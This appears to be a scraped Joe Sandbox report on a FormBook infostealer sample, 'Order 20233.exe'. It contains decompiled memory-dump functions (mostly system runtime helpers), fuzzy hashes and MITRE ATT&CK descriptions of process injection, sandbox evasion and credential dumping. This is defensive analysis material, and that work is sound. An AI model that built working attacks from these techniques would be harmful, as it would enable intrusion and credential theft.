Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: dcaeaac93295ac9cccb6171802a1624a001a934ec4964d87d532aea89acb4c70
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 91D0A931401185BAEB02FF18C2187683BB2BB00B08F582465A90286852C33ACB0AC722

Uniqueness

Uniqueness Score: -1.00%

Function 0185DB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0185DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01874620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0185db4d
0x0185db54
0x0185db5f
0x0185db56
0x0185db56
0x0185db5c
0x0185db5c

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 54706eff25e987705c8dbcccf1d919b62ee27c9790720de75aa2c017c9eb2d26
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 8DC08C30280A01EAFB222F24CD01B003AA1BB10B02F4400A06B00DA0F0EB78DA01E600

Uniqueness

Uniqueness Score: -1.00%

Function 018DA537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018DA537(intOrPtr _a4, intOrPtr _a8) {

				return L01878E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x018da553

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 8d4de20235539cd2f869e452546c33ecd29296e1f27d6077f8f2cc39eb129c9f
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 09C08C33080248BBCB126F85CC00F067F2AFBA4B60F108410FA080B570C632EA70EB84

Uniqueness

Uniqueness Score: -1.00%

Function 01873A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01873A1C(intOrPtr _a4) {
				void* _t5;

				return L01874620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x01873a35

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 1cc0bdef32f524a77e0e01e307c84c7cf2e7cd9015ec40a8909006ee74aa2bc1
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: A6C08C32080248FBC7126E45DC00F017B29E7A0B60F000020B6040A5608532EDA0D588

Uniqueness

Uniqueness Score: -1.00%

Function 0185AD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0185AD30(intOrPtr _a4) {

				return L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0185ad49

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 94c48a50090968f56c95aa9f98fc22f1339c7c09452360de6328478f26d80751
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 81C02B330C024CBBC7126F49CD00F01BF2DE7A0BA0F000020F6044B671C932ED61D588

Uniqueness

Uniqueness Score: -1.00%

Function 018836CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018836CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x018836d2
0x018836e8
0x018836d4
0x018836e5
0x018836e5

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 57b12d90fb3b10428726bfd54941865c5e9f01e180b298bceb88bd8a8cf9bb85
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 49C08C70150440EAEA156B288D00B147254B700B21F6402547220854E0D528ED00E100

Uniqueness

Uniqueness Score: -1.00%

Function 018676E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018676E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x018676e4
0x00000000
0x018676f8
0x018676fd

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 5f9be77932f2a73453493447d2a009f015ec0e5a53e7d969caab639b47b4ee1c
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 8AC08C701411845AEB2A570CCE24B203A59AB0870DF68019CAA01894A2C36CEE03C248

Uniqueness

Uniqueness Score: -1.00%

Function 01877D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01877D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x01877d56
0x01877d5b
0x01877d60
0x01877d5d
0x01877d5d
0x01877d5d

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: d088f846dece8ef4de7c2ebae3340c531084f13a28b1fb3858835ca3f32653a0
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: B1B092353029808FCE16DF18C084B1533E4BB48B40B8400D0E400CBA21D229E900C900

Uniqueness

Uniqueness Score: -1.00%

Function 01882ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01882ACB() {
				void* _t5;

				return E0186EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x01882adc

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: f8522929d8d38b23e71a84c164e97027f35e4cb6669095392d82be9a36d6ef11
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 82B01232C10441CFCF02EF44C650B197335FB00750F054490910177930C229AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0188645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0188645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x194d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0189FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E01872280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E0186FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x194b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0189B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x0188645b
0x01886463
0x0188646d
0x01886475
0x0188647a
0x0188647e
0x01886480
0x0188648c
0x01886490
0x01886495
0x01886498
0x0188649b
0x0188649f
0x018864a1
0x018c7c07
0x018c7c09
0x018c7c0c
0x00000000
0x018864a7
0x018864a7
0x018864aa
0x018c7bf7
0x018c7c00
0x00000000
0x018c7bf9
0x018c7bf9
0x018c7bf9
0x018864b0
0x018864b0
0x018864b2
0x018864b2
0x018864b3
0x018864ba
0x01886553
0x0188655e
0x01886566
0x0188656c
0x01886575
0x0188657f
0x01886585
0x01886588
0x01886588
0x018864c7
0x018864cb
0x018864ce
0x018864d3
0x018864da
0x018864e5
0x018864ed
0x018864f1
0x018864f5
0x018864f6
0x018864fa
0x01886502
0x01886503
0x01886504
0x01886507
0x0188651a
0x01886524
0x01886524
0x01886526
0x01886526
0x018864aa
0x0188652c
0x0188652d
0x0188652e
0x01886539

APIs

RtlDebugPrintTimes.NTDLL ref: 0188651A

Strings

0, xrefs: 018864E5
0, xrefs: 018864FA

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 2f31ab7d4e97723f066e89d2f3abf7d701ddbc35dd70fb9ed8a75d244e7ad0b0
Instruction ID: 8205685d6e21e3cb989152c04302366d387bbc0ad16a3d2efc5d139bf1926cc6
Opcode Fuzzy Hash: 2f31ab7d4e97723f066e89d2f3abf7d701ddbc35dd70fb9ed8a75d244e7ad0b0
Instruction Fuzzy Hash: F6415BB16087069FC311DF2CC584A1ABBE5FB89718F14456EF588DB301D731EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 018EFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E018EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0189CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E018E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E018E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x018efdda
0x018efde2
0x018efde5
0x018efdec
0x018efdfa
0x018efdff
0x018efe0a
0x018efe0f
0x018efe17
0x018efe1e
0x018efe19
0x018efe19
0x018efe19
0x018efe20
0x018efe21
0x018efe22
0x018efe25
0x018efe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018EFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018EFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018EFE2B

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 0f3573a719cee61d27cce6e11a83dc36f392c38dafaed9a675329c82d68ca1d0
Instruction ID: 73cff755b631ae4b1bd64d8b18b1312dfa073e4ad0b0a51101c55afcaad3a0d4
Opcode Fuzzy Hash: 0f3573a719cee61d27cce6e11a83dc36f392c38dafaed9a675329c82d68ca1d0
Instruction Fuzzy Hash: B7F0FC76144102BFE6201A49DC05F237F9ADB45730F140314F714961D1DA62FA3087F5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Order 20233.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Order 20233.exe.log

C:\Users\user\AppData\Local\Temp\4184-48M

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
Order 20233.exe

Function 00007FFBAD3948D9 Relevance: 3.6, Strings: 2, Instructions: 1062
COMMON

Function 00007FFBAD38BD36 Relevance: 2.2, Strings: 1, Instructions: 921
COMMON

Function 00007FFBAD39A0AD Relevance: 2.1, APIs: 1, Instructions: 613
COMMON

Function 00007FFBAD3830B0 Relevance: 1.7, Strings: 1, Instructions: 438
COMMON

Function 00007FFBAD399F90 Relevance: 1.6, APIs: 1, Instructions: 138
nativeCOMMON

Function 00007FFBAD39A538 Relevance: 1.6, APIs: 1, Instructions: 100
nativethreadCOMMON